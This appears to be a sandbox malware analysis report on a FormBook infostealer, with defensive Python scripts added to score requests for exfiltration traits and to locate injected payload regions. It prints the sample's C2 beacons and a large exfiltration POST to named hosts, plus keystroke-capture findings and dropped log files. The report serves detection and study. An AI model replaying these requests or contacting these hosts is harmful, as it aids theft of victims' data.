55 73 6e 45 7a 62 30 53 38 62 69 52 31 4b 6b 2d 44 53 38 39 4a 49 6a 65 28 64 51 38 33 6d 70 50 49 37 58 70 68 63 54 38 64 69 33 64 4f 56 4f 38 44 56 57 46 6e 49 6a 33 57 63 71 46 72 33 36 47 32 58 64 72 4c 68 79 53 38 68 47 77 49 50 45 53 36 58 37 36 30 4c 52 48 6e 48 63 67 68 70 73 52 43 47 4e 6c 4b 38 75 5a 7e 45 72 4b 4d 7a 4d 57 67 35 4e 50 42 50 4b 53 78 52 6c 35 6e 4f 79 6e 45 76 50 58 64 58 42 47 43 6d 41 4d 53 55 7e 45 6c 69 75 51 4a 4a 64 53 7a 6c 68 4a 79 54 67 58 4e 4b 50 62 7e 51 75 4a 4a 58 62 5f 62 39 6f 66 75 46 6f 64 7a 54 76 41 46 74 44 44 79 42 34 41 64 4e 28 6e 54 46 33 55 4f 64 46 30 52 5a 34 75 74 47 5a 61 67 63 4c 61 44 4d 32 6e 58 75 6c 56 7e 70 62 49 48 45 54 4a 69 6b 50 37 53 78 67 71 6a 32 63 73 28 49 58 6c 49 37 46 79 4c 6a 4a 30 61 2d 35 45 45 79 33 75 76 63 6f 77 6a 30 7a 31 4d 59 6b 4f 69 39 76 74 46 54 58 33 46 48 30 78 4c 4b 79 75 76 53 4a 72 54 4b 6e 4a 69 38 61 4a 4e 4e 49 4e 72 36 53 56 64 72 4c 37 48 39 53 37 37 4d 61 6b 39 7a 58 63 6c 64 42 59 71 59 43 4b 
33 61 45 77 49 59 5a 31 57 31 62 71 34 6b 57 64 57 72 30 64 78 39 39 45 66 48 55 6f 6a 63 71 5f 46 48 69 6e 5a 6d 7e 51 35 70 77 33 36 5f 78 74 43 4e 4d 59 63 64 42 44 49 4d 4a 34 53 38 4d 34 4c 36 46 39 38 6c 4c 78 6b 41 48 69 28 6c 6a 31 37 65 33 6a 48 65 31 39 7e 51 6b 54 4d 74 4e 34 4d 5a 70 53 65 73 68 73 64 4a 39 68 33 6d 6c 67 37 49 7a 68 43 49 58 71 4f 46 66 4c 64 6c 79 69 6f 68 47 78 77 78 75 54 5a 65 7e 6a 34 76 6d 2d 72 7a 6a 5f 65 36 70 62 54 6c 67 79 67 4a 30 59 43 43 31 30 36 56 4d 79 6b 62 64 51 6b 34 78 38 55 34 78 5f 42 6f 30 53 67 43 54 79 4e 6a 6e 33 39 54 4e 31 73 67 31 4d 71 74 36 4e 57 4a 67 4a 65 46 45 37 73 66 75 6f 58 2d 39 58 43 4f 31 59 68 33 46 78 41 30 66 47 51 39 67 32 6c 44 62 31 33 7a 6a 38 7e 63 42 74 74 68 69 47 37 58 33 55 52 58 44 37 44 6a 6f 4d 4b 77 78 65 6c 69 61 34 74 58 59 47 31 54 58 32 38 38 58 33 45 47 50 73 49 72 61 50 52 69 37 39 53 53 71 6d 74 78 4a 56 76 69 53 75 6d 79 6f 63 49 65 63 2d 6c 6b 31 35 54 6a 41 4c 32 75 75 36 6b 6c 52 45 4b 78 49 51 4b 77 56 70 35 41 6f 30 62 33 51 43 59 31 78 4d 6b 76 68 71 6e 5
Downloads files from webservers via HTTP
- Source: global traffic; HTTP traffic detected:

```
GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.pawlowski.life
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

GET /ez3/?dL3=oh/nSlzENG0qUOAwPXeIQOtwW6r8d6QREB9M6hBu+NM+9UHPsG9g+Ot2gFGRe3aStlqv&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.lcpierpontphotography.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

GET /ez3/?dL3=7CEQ+k742KWuCXQBHgFuLA7JV8UfVcRSEMIHryxdtZ0WgVQp3Q3kFEzSW7ScRDzGFE92&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.tylermercer.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

GET /ez3/?dL3=X3u3PzGnlM4B8cIThswW3+TZhgNWE0aZtyVvUn4Lv16SAoXv0FRCFRv3M3XIz91P9rzv&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.allixanes.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1
Host: www.pawlowski.life
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
```

Performs DNS lookups
- Source: unknown; DNS traffic detected: queries for: www.oraning.net

Posts data to webserver
 Source: unknown HTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.lcpierpontphotography.comConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.lcpierpontphotography.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lcpierpontphotography.com/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 67 44 7a 64 4d 41 6d 55 4a 44 4e 43 4b 2d 73 32 4e 51 4f 57 43 49 52 6f 63 37 50 49 65 71 64 50 57 45 51 35 70 42 78 76 75 39 4d 5a 33 32 58 50 6a 6c 6c 35 75 61 51 6f 37 30 4b 56 59 55 61 47 34 55 54 37 36 58 37 66 44 55 58 32 7e 62 6e 63 79 61 61 49 45 4f 75 31 59 66 42 7a 35 61 77 6f 72 56 69 53 72 2d 35 7a 43 41 4c 70 4b 54 48 34 67 47 54 47 79 78 4e 39 47 43 6d 48 5a 68 6f 43 34 34 70 75 38 39 45 51 50 6d 42 7a 70 56 46 4c 72 49 6f 6c 55 5a 6e 4e 4a 44 56 4d 79 4c 56 59 74 46 42 75 47 7a 77 79 76 2d 45 45 58 57 34 51 59 66 38 56 33 7a 66 70 7a 6e 69 46 48 49 6f 71 62 4d 28 32 7e 4a 43 57 69 54 63 56 49 59 78 55 6b 67 73 53 31 71 6e 53 4e 5f 63 4b 43 4c 65 5a 5a 5f 39 6b 49 36 4f 41 59 75 72 39 67 58 6f 6c 46 78 61 5f 6f 6e 55 6c 4d 5a 53 6d 35 48 70 52 68 4d 54 41 28 39 76 59 52 4c 41 56 30 53 46 66 43 30 52 6e 4e 61 48 6c 42 53 7a 4f 7e 4c 4e 75 37 51 6c 7a 32 58 53 46 62 42 74 77 32 6d 65 44 6e 78 65 38 4c 52 67 37 7e 56 34 51 6a 4f 54 7a 59 4c 31 46 65 54 38 47 39 73 6f 30 45 73 70 76 39 41 6d 68 39 58 4b 43 4e 61 34 42 57 6b 55 74 56 77 4e 59 36 51 71 6f 38 37 72 56 31 6c 68 6d 72 34 38 32 57 37 33 5f 4c 51 70 5a 44 39 34 45 79 6a 72 69 51 31 48 5a 64 75 46 6d 59 44 48 76 42 34 48 59 66 52 43 59 77 62 7e 6c 72 34 7a 46 35 6d 69 74 6a 36 6a 6a 69 32 56 49 28 73 39 34 74 32 6f 45 6a 53 57 71 30 50 33 79 32 63 4d 59 58 33 48 61 51 61 5a 79 34 30 72 46 70 75 72 5a 71 6c 28 4f 4a 35 4e 5f 64 5a 47 6b 41 47 4d 32 30 77 4f 64 48 52 6e 6d 4a 4e 74 57 30 6c 66 74 71 31 6c 4b 65 45 65 74 4f 77 53 76 34 38 
52 79 4c 71 41 7a 52 65 73 64 55 56 73 50 73 75 72 76 50 61 4a 66 45 47 6e 37 53 73 59 39 41 4a 39 6e 35 46 6b 44 59 58 6b 32 7e 50 4f 57 6b 6c 6c 56 6b 57 28 4f 4d 4a 54 4d 48 69 43 34 76 6b 34 35 52 58 6b 65 41 53 54 69 72 5f 28 37 64 73 59 53 7a 5a 59 4c 52 49 44 32 65 48 68 6a 42 35 63 45 46 6e 55 45 66 46 4a 31 34 53 4b 64 36 36 71 42 7e 79 6b 75 37 77 58 33 70 2d 38 6c 31 74 43 4d 73 6e 66 58 6a 46 5a 67 7e 78 35 72 28 64 69 31 44 4a 4f 50 71 65 79 53 6c 33 39 47 6f 31 4f 74 65 64 59 51 6c 63 63 2d 34 5a 41 52 43 52 31 6d 58 4b 7e 48 34 70 64 65 69 43 6a 41 45 63 61 37 45 72 75 57 28 64 78 4e 72 37 34 47 52 69 70 37 55 4d 4b 5f 44 62 4f 33 6d 77 6a 36 68 67 65 6b 67 6d 44 77 35 77 65 74 6b 52 7a 66 36 4f 6c 73 52 79 79 70 74 4e 74 72 6e 5f 62 49 30 44 50 52 69 6d 4f 58 67 42 78 49 64 78 5a 6b 76 63 61 54 31 6c 79 70 68 4c 61 4f 75 4e 71 5f 56 49 77 46 28 4c 44 70 54 42 51 44 6a 33 6e 53 32 5a 41 49 43 31 43 62 6d 49 65 4e 4a 6f 72 6f 59 7a 57 55 6a 45 67 63 77 4e 51 53 72 70 4c 69 6b 6a 36 4e 6b 5
 Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
 Source: global traffic HTTP traffic detected:
 HTTP/1.1 404 Not Found
 Content-Type: text/html
 Server: Microsoft-IIS/8.5
 X-Powered-By: ASP.NET
 Date: Tue, 19 May 2020 08:38:38 GMT
 Connection: close
 Content-Length: 1245
 The body is the stock IIS error page: the raw bytes below decode to <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> ... <title>404 - File or directory not found.</title> ..., truncated in the report. A 404 only says this host did not serve anything at /ez3/ at the time of analysis; it does not make the POST any less an exfiltration attempt, and the www.allixanes.com/ez3/ string found in svchost.exe memory (below) is another host carrying the same path.
 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 
30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68
 URLs found in memory or binary data
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
 Source: svchost.exe, 00000005.00000002.2486714198.00000000035A9000.00000004.00000001.sdmp String found in binary or memory: http://www.allixanes.com
 Source: svchost.exe, 00000005.00000002.2486714198.00000000035A9000.00000004.00000001.sdmp String found in binary or memory: http://www.allixanes.com/ez3/
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
 Source: explorer.exe, 00000004.00000000.889874232.0000000007B92000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
 Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
 Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
 Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/ocid=iehpC:
 Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/ocid=iehp
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
 Only the two www.allixanes.com strings in the injected svchost.exe carry the same /ez3/ path as the observed POST and are attributable to the sample. The explorer.exe strings from the read-only region at 0A8D6000 are font-vendor and licence URLs of the kind carried in font name tables, the www.msn.com entries are Internet Explorer's default home page, and nothing else in the report corroborates the www.autoitscript.com string; none of these should be used as indicators.
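The two traffic dumps above and the URL strings from memory are the raw material for a detection; the following is an added example (not code from the report or from any sandbox product) that parses dumps in the report's collapsed format, scores the request for the traits of the FormBook POST seen here, and pivots on the URI path to find the other hosts in the memory strings. The header text is copied from the report, the hex bodies are the first bytes of the report's truncated dumps, the memory-string list is a subset, and the header-name list used to re-split the glued lines is an assumption that only standard names occur.

```python
"""Parse Joe Sandbox-style 'HTTP traffic detected' dumps and score a request
for FormBook exfiltration traits. Added example; samples copied from the
report, bodies truncated as in the report."""
import re
from urllib.parse import urlsplit

# The report collapses CRLF, so header lines are glued together. We split on
# a fixed list of header names (assumption: only these names occur).
HEADER_NAMES = ("Host", "Connection", "Content-Length", "Cache-Control", "Origin",
                "User-Agent", "Content-Type", "Accept", "Accept-Language",
                "Accept-Encoding", "Referer", "Server", "X-Powered-By", "Date")
_SPLIT = re.compile(r"(?=(?:%s):)" % "|".join(map(re.escape, HEADER_NAMES)))

REQUEST = ("POST /ez3/ HTTP/1.1Host: www.lcpierpontphotography.comConnection: close"
           "Content-Length: 153125Cache-Control: no-cacheOrigin: http://www.lcpierpontphotography.com"
           "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
           "Content-Type: application/x-www-form-urlencodedAccept: */*"
           "Referer: http://www.lcpierpontphotography.com/ez3/Accept-Language: en-US"
           "Accept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 67 44 7a 64 4d 41 6d 55 4a 44 4e 43 "
           "4b 2d 73 32 4e 51 4f 57 43 49 52 6f 63 37 50 49 65 71 64 50 57 45 51 35 70 42 78 76 75 39")
RESPONSE = ("HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5"
            "X-Powered-By: ASP.NETDate: Tue, 19 May 2020 08:38:38 GMTConnection: close"
            "Content-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c")
# Subset of the memory strings, plus the host the POST actually went to.
MEMORY_URLS = ["http://www.allixanes.com", "http://www.allixanes.com/ez3/",
               "http://fontfabrik.com", "http://www.msn.com/?ocid=iehp",
               "http://www.lcpierpontphotography.com/ez3/"]

FORMBOOK_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"


def parse_dump(text):
    """Return (start_line, {header: value}, body_bytes) for one dump."""
    head, _, raw = text.partition("Data Raw: ")
    parts = [p for p in _SPLIT.split(head) if p]
    headers = {}
    for part in parts[1:]:
        name, _, value = part.partition(":")
        headers[name.strip()] = value.strip()
    return parts[0].strip(), headers, bytes.fromhex(raw) if raw else b""


def body_truncated(headers, body):
    """True when the dump carries fewer bytes than Content-Length declares."""
    return len(body) < int(headers.get("Content-Length", "0"))


def formbook_post_traits(start, headers, body):
    """Traits this request shares with the observed FormBook POST. None is
    conclusive alone; Referer == Origin + path together with a single
    short-named field carrying a long custom-alphabet blob is the strongest."""
    traits = []
    method, path, _ = start.split(" ", 2)
    if method != "POST":
        return traits
    if re.fullmatch(r"/[a-z0-9]{2,4}/", path):        # /ez3/-style path (assumed range)
        traits.append("short_path")
    if headers.get("Content-Type") == "application/x-www-form-urlencoded":
        traits.append("form_urlencoded")
    if headers.get("Connection") == "close":
        traits.append("connection_close")
    origin = headers.get("Origin", "")
    if (origin and headers.get("Referer") == origin + path
            and urlsplit(origin).hostname == headers.get("Host")):
        traits.append("referer_is_origin_plus_path")
    if headers.get("User-Agent") == FORMBOOK_UA:
        traits.append("ie11_trident_user_agent")
    name, sep, value = body.partition(b"=")
    # Alphabet as observed in the dump: base64-like plus '-', '_', '~', '(' and ')'.
    if sep and len(name) <= 4 and b"&" not in value and re.fullmatch(rb"[A-Za-z0-9_()~-]+", value):
        traits.append("single_short_field_custom_alphabet")
    return traits


def hosts_sharing_path(urls, path):
    """Hosts in the memory strings that carry the same URI path as the POST.
    FormBook rotates through a list of hosts with one fixed path, so these
    are the other C2 candidates worth blocking and hunting for."""
    return sorted({urlsplit(u).hostname for u in urls if urlsplit(u).path == path})
```

Run it over the full "HTTP traffic detected" lines of a report to list which traits each request triggers; a single short-path POST with all six traits is worth an alert on its own, while the path pivot turns one observed C2 into the rest of the rotation list.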

 Contains functionality to retrieve information about pressed keystrokes
 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 0_2_00449F24 GetKeyboardState, 0_2_00449F24
 Creates a DirectInput object (often for capturing keystrokes)
 Source: sdv88p2lg.exe, 0000000E.00000002.1485735250.0000000000790000.00000004.00000020.sdmp Binary or memory string:

### E-Banking Fraud:

 Yara detected FormBook
 Source: Yara match File source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORY
 Source: Yara match File source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORY
 Source: Yara match File source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
 Source: Yara match File source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Source: Yara match File source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
 Source: Yara match File source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Source: Yara match File source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Source: Yara match File source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPE
 Source: Yara match File source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPE
 Source: Yara match File source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
 Source: Yara match File source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPE
 Source: Yara match File source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
 Source: Yara match File source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPE
 Source: Yara match File source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPE
 Source: Yara match File source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
 Source: Yara match File source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPE
 Source: Yara match File source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Source: Yara match File source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPE
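The source identifiers above encode where each Yara hit was taken from, which is what a triager needs to tell an unpacked payload in RWX memory from a data blob. The following is an added example, not the report's or the sandbox vendor's code: it decodes the memory-dump and unpacked-PE identifiers into process id, snapshot, base address and page protection, and summarises which processes held FormBook code in writable and executable memory. The field layout is inferred from the identifiers themselves (an assumption about the sandbox's naming, including which field is the snapshot index); the protection values are the standard Windows PAGE_* constants, and the source list is a subset copied from the report.

```python
"""Decode Joe Sandbox-style Yara source ids and summarise RWX FormBook
regions per process. Added example; SOURCES is a subset of the report's list."""
import re
from collections import defaultdict

PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

SOURCES = [
    "00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp",
    "00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp",
    "0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp",
    "0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp",
    "00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp",
    "00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp",
    "0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp",
    "00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp",
    "00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp",
    "00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp",
    "3.2.xg28sL5JDm.exe.400000.0.unpack",
    "15.1.sdv88p2lg.exe.400000.0.raw.unpack",
    "14.2.sdv88p2lg.exe.2600000.3.unpack",
]

# Assumed layout: pid.snapshot.uniqueid.base.protection.type.sdmp (all hex)
_SDMP = re.compile(r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.\d+\.([0-9A-Fa-f]{16})"
                   r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$")
# Assumed layout: pid.snapshot.image.base.index[.raw].unpack (pid/index decimal)
_UNPACK = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9A-Fa-f]+)\.(\d+)\.(raw\.)?unpack$")


def parse_source(name):
    """Return a dict describing one source id, or raise on an unknown form."""
    m = _SDMP.match(name)
    if m:
        pid, snap, base, prot, _kind = m.groups()
        p = int(prot, 16)
        return {"kind": "memory", "pid": int(pid, 16), "snapshot": int(snap, 16),
                "base": int(base, 16), "protect": PAGE_PROTECT.get(p, hex(p)),
                "executable": bool(p & 0xF0),   # PAGE_EXECUTE* constants live in 0x10..0x80
                "image": None, "raw": None}
    m = _UNPACK.match(name)
    if m:
        pid, snap, image, base, _idx, raw = m.groups()
        return {"kind": "unpacked_pe", "pid": int(pid), "snapshot": int(snap),
                "base": int(base, 16), "protect": None, "executable": True,
                "image": image, "raw": raw is not None}
    raise ValueError("unrecognised source id: %s" % name)


def rwx_code_by_process(names):
    """pid -> sorted bases of PAGE_EXECUTE_READWRITE dumps that matched.
    An unpacker writes its payload into memory it can also execute; a
    normally mapped image section is executable but not writable."""
    regions = defaultdict(set)
    for name in names:
        src = parse_source(name)
        if src["kind"] == "memory" and src["protect"] == "PAGE_EXECUTE_READWRITE":
            regions[src["pid"]].add(src["base"])
    return {pid: sorted(bases) for pid, bases in sorted(regions.items())}


def image_base_overwritten(names):
    """pids with an RWX FormBook region at 0x400000, the classic 32-bit
    preferred image base: the payload was placed where a main module lives,
    which is what process hollowing leaves behind."""
    return sorted(pid for pid, bases in rwx_code_by_process(names).items()
                  if 0x400000 in bases)
```

Feed it the complete source list from a report: processes that appear only with PAGE_READWRITE hits hold FormBook data (configuration, staged stolen data), while those with PAGE_EXECUTE_READWRITE hits, and above all an RWX region at 0x400000, are the ones running the payload and worth dumping first.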

### System Summary:

 Detected FormBook malware
 Source: C:\Windows\SysWOW64\svchost.exe Dropped file: C:\Users\user\AppData\Roaming\K4O1B2B4\K4Ologri.ini
 Source: C:\Windows\SysWOW64\svchost.exe Dropped file: C:\Users\user\AppData\Roaming\K4O1B2B4\K4Ologrf.ini
